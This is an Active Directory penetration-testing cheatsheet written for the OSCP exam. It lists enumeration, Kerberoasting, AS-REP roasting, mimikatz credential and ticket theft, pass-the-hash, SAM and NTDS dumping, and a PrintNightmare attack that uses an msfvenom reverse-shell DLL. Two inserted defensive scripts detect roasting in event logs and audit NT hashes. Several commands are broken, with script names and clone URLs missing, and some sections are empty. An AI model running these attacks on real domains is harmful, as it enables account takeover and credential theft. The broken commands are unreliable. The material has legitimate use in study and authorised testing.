26. Apr 2022

Active Directory

Here are some tips and tricks that got me through the AD part of my OSCP exam.

Please note that this cheatsheet is outdated. A rewrite is in progress.

Set DNS / hosts #

Add the DC and all clients you find to your /etc/hosts file, e.g.:

DCIP dc1
IP client1

You could also add the DC as a nameserver in /etc/resolv.conf, but that slows down every Internet lookup: each request first goes to the DC and has to time out there before the next resolver is tried.

Get a Shell or Credentials #

DNS Recon

Use fierce↗ to check for other servers inside the AD.

fierce --domain DOMAIN --dns-servers DCIP --subdomain-file /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt

User Recon

Use windapsearch↗ to make LDAP queries. It often does not require a password!

# Query users
windapsearch -m users --dc DCIP

# Query login names
windapsearch -m users --attrs UserPrincipalName --dc DCIP | awk -F"Name:" '{print $2}' | awk '!/^$/'

# Descriptions (often contain passwords)
windapsearch -m users --attrs Description --dc DCIP

# Query all attributes for password
windapsearch -m users --full --dc DCIP | grep -i password

Use Kerbrute↗ to enumerate users

kerbrute userenum --dc DC -d DOMAIN /usr/share/wordlists/seclists/Usernames/Names/names.txt 
kerbrute userenum --dc DC -d DOMAIN /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt

Use CrackMapExec↗ to enumerate users

cme smb IP -u '' -p '' --users

# Get password policy
cme smb IP -u '' -p '' --pass-pol

Use username-anarchy↗ to turn names found on company websites into username formats

username-anarchy -i INFILE > OUTFILE

Use cewl↗ to crawl websites for words to pack into a wordlist

cewl -d DEPTH -m MINIMUMLENGTH --with-numbers -w OUTFILE LINK
hashcat --force INFILE -r /usr/share/hashcat/rules/best64.rule --stdout > OUTFILE

RPC Recon

# Could require credentials
rpcclient -U '' -N IP
    # Check printer description for passwords

impacket-rpcdump IP
# Check for PrinterNightmare
impacket-rpcdump IP | egrep 'MS-RPRN|MS-PAR'

SMB Recon

Check for anonymous/open shares

smbmap -H IP
cme smb IP -u '' -p '' --shares
enum4linux IP

After Shell and/or Credentials #

Get a Shell #

Some ways to get a shell by just having a pair of credentials:

# Common (impacket expects DOMAIN/user, not DOMAIN\user)
impacket-psexec 'DOMAIN/user:PASSWORD@IP' -dc-ip DCIP
impacket-smbexec 'DOMAIN/user:PASSWORD@IP' -dc-ip DCIP
impacket-wmiexec 'DOMAIN/user:PASSWORD@IP' -dc-ip DCIP

# WinRM (tcp/5985) needs to be enabled
evil-winrm -i IP -u 'DOMAIN\user' -p 'PASSWORD'

# RDP (tcp+udp/3389) needs to be enabled
rdesktop -r clipboard:PRIMARYCLIPBOARD -r disk:host=/home/ -u 'USER' -p 'PASSWORD' IP

# Quite rare
impacket-atexec 'DOMAIN/user:PASSWORD@IP' 'command'
impacket-dcomexec 'DOMAIN/user:PASSWORD@IP'

Check for ASREPRoast #

impacket-GetNPUsers 'DOMAIN/user:PASSWORD' -dc-ip DCIP

Check for Kerberoast #

impacket-GetUserSPNs 'DOMAIN/user:PASSWORD' -dc-ip DCIP

Basic PowerShell script you can run from a shell inside the AD:

$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name
$SearchString = "LDAP://"
$SearchString += $PDC + "/"
$DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
$SearchString += $DistinguishedName
$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
$objDomain = New-Object System.DirectoryServices.DirectoryEntry
$Searcher.SearchRoot = $objDomain

# Search by what (example filter: every account that has an SPN set)
$Searcher.filter = "serviceprincipalname=*"

$Result = $Searcher.FindAll()

Write-Host "---------------------------"
Foreach($obj in $Result) {
    # uncomment to print all attributes
    # ForEach($prop in $obj.Properties) { $prop }
    Write-Host "[SAM Account Name]"
    Write-Host $obj.Properties["samaccountname"]
    Write-Host "[User Principal Name]"
    Write-Host $obj.Properties["userprincipalname"]
    Write-Host "[Service Principal Name]"
    Write-Host $obj.Properties["serviceprincipalname"]
    Write-Host "---------------------------"
}

To request the ticket with PowerShell:

add-type -assemblyname system.identitymodel
new-object system.identitymodel.tokens.kerberosrequestorsecuritytoken -Argumentlist 'SPN'

To request the ticket with mimikatz:

    kerberos::ask /target:SPN
    kerberos::list /export

Verify that the ticket is in memory with klist. Then use mimikatz↗ to export the ticket. This does not require admin or SYSTEM privileges.

    # Verify the ticket exists (Windows command, outside mimikatz)
    klist
    # Export to current folder
    kerberos::list /export

Transfer the ticket to Kali, and crack it with kerberoast↗.

# Setup
virtualenv --python=python3 venv
source venv/bin/activate
git clone     
cd kerberoast
pip3 install pyasn1

# Crack
python /usr/share/wordlists/rockyou.txt ticket.kirbi

Cracking is also possible with Hashcat and kirbi2hashcat↗.

python ticket.kirbi > ticket.hashcat
hashcat --force ticket.hashcat -m 13100  /usr/share/wordlists/rockyou.txt
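
The detection-side counterpart of the ASREPRoast and Kerberoast checks above, as an added example that is not part of the original cheatsheet: it scans Windows Security events 4768 (TGT request) and 4769 (TGS request) for the two traces these tools leave, a successful TGT for an account with pre-authentication disabled, and one client asking for RC4 (0x17) service tickets for several distinct service accounts in a row. The flattened key=value event lines, the account and service names, the IP addresses and the threshold of three services are all constructed for the example; real exports carry the same field names as EVTX/XML attributes.

```python
"""
Detection helper for ASREPRoast / Kerberoast traces in Security event logs.
  * 4768, PreAuthType 0, Status 0x0  -> account without Kerberos pre-auth (AS-REP roastable)
  * 4769, TicketEncryptionType 0x17  -> RC4 service ticket; many from one IP
    for different service accounts is the GetUserSPNs / Rubeus kerberoast pattern
All event lines below are constructed for this example.
"""
import re
from collections import defaultdict

# Constructed, flattened key=value renderings of Security events (not real exports)
SAMPLE_EVENTS = [
    "EventID=4769 TargetUserName=alice@CORP.LOCAL ServiceName=svc_sql TicketEncryptionType=0x17 IpAddress=10.0.0.5",
    "EventID=4769 TargetUserName=alice@CORP.LOCAL ServiceName=svc_web TicketEncryptionType=0x17 IpAddress=10.0.0.5",
    "EventID=4769 TargetUserName=alice@CORP.LOCAL ServiceName=svc_backup TicketEncryptionType=0x17 IpAddress=10.0.0.5",
    "EventID=4769 TargetUserName=bob@CORP.LOCAL ServiceName=FILESRV01$ TicketEncryptionType=0x12 IpAddress=10.0.0.7",
    "EventID=4769 TargetUserName=bob@CORP.LOCAL ServiceName=svc_sql TicketEncryptionType=0x17 IpAddress=10.0.0.7",
    "EventID=4769 TargetUserName=bob@CORP.LOCAL ServiceName=krbtgt TicketEncryptionType=0x17 IpAddress=10.0.0.7",
    "EventID=4768 TargetUserName=carol ServiceName=krbtgt PreAuthType=0 Status=0x0 IpAddress=10.0.0.5",
    "EventID=4768 TargetUserName=dave ServiceName=krbtgt PreAuthType=2 Status=0x0 IpAddress=10.0.0.7",
    "EventID=4768 TargetUserName=nobody ServiceName=krbtgt PreAuthType=0 Status=0x6 IpAddress=10.0.0.5",
]

KV = re.compile(r"(\w+)=(\S+)")


def parse_event(line):
    """Turn one flattened event line into a dict of its fields."""
    return dict(KV.findall(line))


def is_roastable_tgs(ev):
    """4769 for a user service account (not a computer account, not krbtgt) with RC4."""
    if ev.get("EventID") != "4769":
        return False
    svc = ev.get("ServiceName", "")
    if svc.endswith("$") or svc.lower() == "krbtgt":
        return False
    return ev.get("TicketEncryptionType", "").lower() == "0x17"


def kerberoast_sources(lines, threshold=3):
    """Client IP -> set of service accounts it requested RC4 tickets for,
    keeping only clients that hit at least `threshold` distinct services."""
    by_ip = defaultdict(set)
    for line in lines:
        ev = parse_event(line)
        if is_roastable_tgs(ev):
            by_ip[ev["IpAddress"]].add(ev["ServiceName"])
    return {ip: svcs for ip, svcs in by_ip.items() if len(svcs) >= threshold}


def asrep_roastable_accounts(lines):
    """Accounts that got a TGT without pre-authentication (4768, PreAuthType 0, success)."""
    found = set()
    for line in lines:
        ev = parse_event(line)
        if (ev.get("EventID") == "4768" and ev.get("PreAuthType") == "0"
                and ev.get("Status", "").lower() == "0x0"):
            found.add(ev["TargetUserName"])
    return found


if __name__ == "__main__":
    print("Kerberoast-like sources:", kerberoast_sources(SAMPLE_EVENTS))
    print("AS-REP roastable accounts:", asrep_roastable_accounts(SAMPLE_EVENTS))
```

The threshold and the RC4-only filter are the two tuning knobs: a domain that still runs RC4 for legacy services will see 0x17 requests from ordinary hosts, so baseline first. Moving service accounts to AES-only both removes that noise and leaves a roaster with etype 17/18 hashes, which crack far more slowly than the 13100/18200 RC4 hashes above.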

Check for the Big Exploits #

These exploits only require valid domain credentials.

PrinterNightmare #


Check with:

impacket-rpcdump IP | egrep 'MS-RPRN|MS-PAR'
# Terminal 1
git clone
wget -O ./impacket/
virtualenv --python=python3 impacket
source impacket/bin/activate
cd impacket
pip3 install .
pip2 install .

# Terminal 2
source impacket/bin/activate
cd impacket

msfvenom -p windows/shell_reverse_tcp LHOST=LISTENINGIP LPORT=LISTENINGPORT -f dll -o evil.dll
# Serve the DLL from the current directory as SMB share "drop"
impacket-smbserver drop $(pwd) -smb2support

# Set up listener

# Terminal 1
python3 '\\LISTENINGIP\drop\evil.dll'

SAM the Admin #


git clone
cd sam-the-admin
virtualenv venv
source venv/bin/activate
pip3 install -r requirements.txt
pip2 install -r requirements.txt

python DOMAIN/USER:PASSWORD -dc-ip DCIP -domain-netbios

ZeroLogon #


git clone
cd zerologon


goldenPAC #


impacket-goldenPac ''

Tools #

Mimikatz #

# Hashdump
    # Elevate
    # Check for logged on passwords (requires admin/system)
    # Dump SAM
    lsadump::lsa /patch

# Overpass the Hash
    sekurlsa::pth /user:USERNAME /domain:DOMAIN /ntlm:NTLM /run:cmd
net use \\DC

# Pass the Ticket
    # Elevate
    # Export the tickets
    # Creates .kirbi files in current folder
    sekurlsa::tickets /export

    # Load Ticket on another client
    kerberos::ptt ticket.kirbi

# Silver Ticket
    # Elevate
    kerberos::golden /user:USER /domain:DOMAIN /sid:DOMAINSID /target:HOSTNAMETARGET /service:SPNTYPE /rc4:SERVICEHASH /ptt

Rubeus #

# Harvest TGTs
.\Rubeus.exe harvest /interval:30

# Password Spray
.\Rubeus.exe brute /password:Password1 /noticket

# Kerberoast
.\Rubeus.exe kerberoast
# Crack on Kali with
hashcat --force ticket.hashcat -m 13100  /usr/share/wordlists/rockyou.txt

# ASREProast
.\Rubeus.exe asreproast
# Crack on Kali with
hashcat --force hash -m 18200  /usr/share/wordlists/rockyou.txt

CrackMapExec #

# Get users
cme smb IP -u USER -d DOMAIN -p PASSWORD --users
# Get shares
cme smb IP -u USER -d DOMAIN -p PASSWORD --shares
# Bruteforce
cme smb IP -u USERLIST -p PWLIST --continue-on-success

Bloodhound #

# Start on Kali
sudo neo4j console
bloodhound --no-sandbox

# Remotely 
bloodhound-python -u USER -p PASSWORD -d DOMAIN -ns IP -c All

# Client
. .\Sharphound.ps1
Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName OUTFILE.zip
.\sharphound.exe --CollectionMethod All --Domain CONTROLLER.local --ZipFileName OUTFILE.zip

Other Techniques #

KrbRelayUp #

Gets you a local SYSTEM shell if LDAP signing and LDAP channel binding are not enforced.

# Do not use cmd.exe or powershell.exe as the service command: they spawn on the desktop, not in your shell
.\KrbRelayUp.exe relay -d DOMAIN -c -cn evilpc$ -cp rockyou@123
.\KrbRelayUp.exe spawn -d DOMAIN -cn evilpc$ -cp rockyou@123 -s evilservice1 -sc "evil1.exe"

# After the first two have been executed once
.\KrbRelayUp.exe krbscm -s evilservice2 -sc "evil1.exe"

Pass the Hash #

Works only on servers with NTLM authentication.

pth-winexe -U USERHASH //IP cmd
evil-winrm -i IP -u USERNAME -H HASH

Dump local SAM and Crack Hashes #

On Windows

# Needs Admin
reg save hklm\sam sam.out
reg save hklm\system system.out

On Kali

samdump2 -o hashes.txt system.out sam.out

hashcat --force hashes.txt -m 1000 /usr/share/wordlists/rockyou.txt
john --format=NT --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
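
As an added example, not from the original cheatsheet: what the `-m 1000` hashes in hashes.txt actually are. An NT hash is MD4 over the UTF-16LE encoding of the password, written out in plain Python here because OpenSSL 3 builds of hashlib often refuse MD4 as a legacy algorithm. The audit functions then take pwdump-style lines (`user:rid:lmhash:nthash:::`), flag accounts whose hash equals that of a banned or blank password, and list accounts sharing one hash (password reuse). The dump lines are constructed; the hashes for `password` and the empty string are the published test vectors, carol's hash is a placeholder.

```python
"""
NT hash audit helper (added example). NT hash = MD4(UTF-16LE(password)),
which is what hashcat -m 1000 / john --format=NT crack from hashes.txt.
MD4 follows RFC 1320. All dump lines below are constructed for the example.
"""
import struct

MASK = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """MD4 digest: three rounds of 16 steps over each 64-byte block."""
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z

    # Padding: 0x80, zeros up to 56 mod 64, then the bit length as little-endian u64
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)

    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        for i, s in zip(range(16), [3, 7, 11, 19] * 4):
            a = _rotl((a + f(b, c, d) + x[i]) & MASK, s)
            a, b, c, d = d, a, b, c
        for i, s in zip([0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], [3, 5, 9, 13] * 4):
            a = _rotl((a + g(b, c, d) + x[i] + 0x5A827999) & MASK, s)
            a, b, c, d = d, a, b, c
        for i, s in zip([0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], [3, 9, 11, 15] * 4):
            a = _rotl((a + h(b, c, d) + x[i] + 0x6ED9EBA1) & MASK, s)
            a, b, c, d = d, a, b, c
        a0, b0, c0, d0 = (a0 + a) & MASK, (b0 + b) & MASK, (c0 + c) & MASK, (d0 + d) & MASK
    return struct.pack("<4I", a0, b0, c0, d0)


def nt_hash(password: str) -> str:
    """Hex NT hash of a password (the 4th field of a pwdump line)."""
    return md4(password.encode("utf-16le")).hex()


# Constructed pwdump-style lines (user:rid:lmhash:nthash:::) as samdump2 emits them.
# The LM field is the well-known "no LM hash" value; carol's NT hash is a placeholder.
SAMPLE_DUMP = [
    "alice:1001:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::",
    "bob:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::",
    "carol:1003:aad3b435b51404eeaad3b435b51404ee:00000000000000000000000000000001:::",
    "dave:1004:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::",
]


def parse_dump(lines):
    """{username: nt_hash} from pwdump-style lines, skipping malformed ones."""
    out = {}
    for line in lines:
        parts = line.strip().split(":")
        if len(parts) >= 4 and len(parts[3]) == 32:
            out[parts[0]] = parts[3].lower()
    return out


def audit_dump(lines, candidates):
    """Users whose NT hash equals the hash of a candidate (banned or blank) password."""
    table = {nt_hash(p): p for p in candidates}
    return {user: table[h] for user, h in parse_dump(lines).items() if h in table}


def shared_hashes(lines):
    """Groups of users that share one NT hash, i.e. use the same password."""
    by_hash = {}
    for user, h in parse_dump(lines).items():
        by_hash.setdefault(h, []).append(user)
    return sorted(sorted(users) for users in by_hash.values() if len(users) > 1)


if __name__ == "__main__":
    print(audit_dump(SAMPLE_DUMP, ["Winter2022!", "password", ""]))
    print(shared_hashes(SAMPLE_DUMP))
```

Running the block prints the matches for the constructed dump. On a real hashes.txt, feed `audit_dump` your banned-password list plus the empty string (to catch blank-password accounts) rather than a full wordlist; the full-wordlist run is hashcat's job, and `shared_hashes` needs no cracking at all to point out password reuse between accounts.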

Dump the NTDS #

impacket-secretsdump -ntds ntds.dit -security registry/SECURITY -system registry/SYSTEM LOCAL -pwd-last-set -user-status -history

DC Sync Attack #


SPN Impersonate #


# We need to have the same time as the DC
# Stop getting time from the hypervisor
sudo service virtualbox-guest-utils stop
# Update time from DC
sudo ntpdate DCIP

# Get a service ticket for the SPN as Administrator (writes Administrator.ccache)
impacket-getST -dc-ip DCIP -spn SPN -hashes HASHFROMDOMUSER -impersonate Administrator DOM/USER
export KRB5CCNAME=Administrator.ccache

impacket-psexec -k DOMAIN/Administrator@DC -no-pass

# Revert NTP to VBox
sudo service virtualbox-guest-utils start

Show LAPS Passwords #

If an owned user is either LAPS admin or just LAPS reader:

ldapsearch -v -x -D USER@DOMAIN -w PASSWORD -b "DC=DOMAIN,DC=com" -h DCIP "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd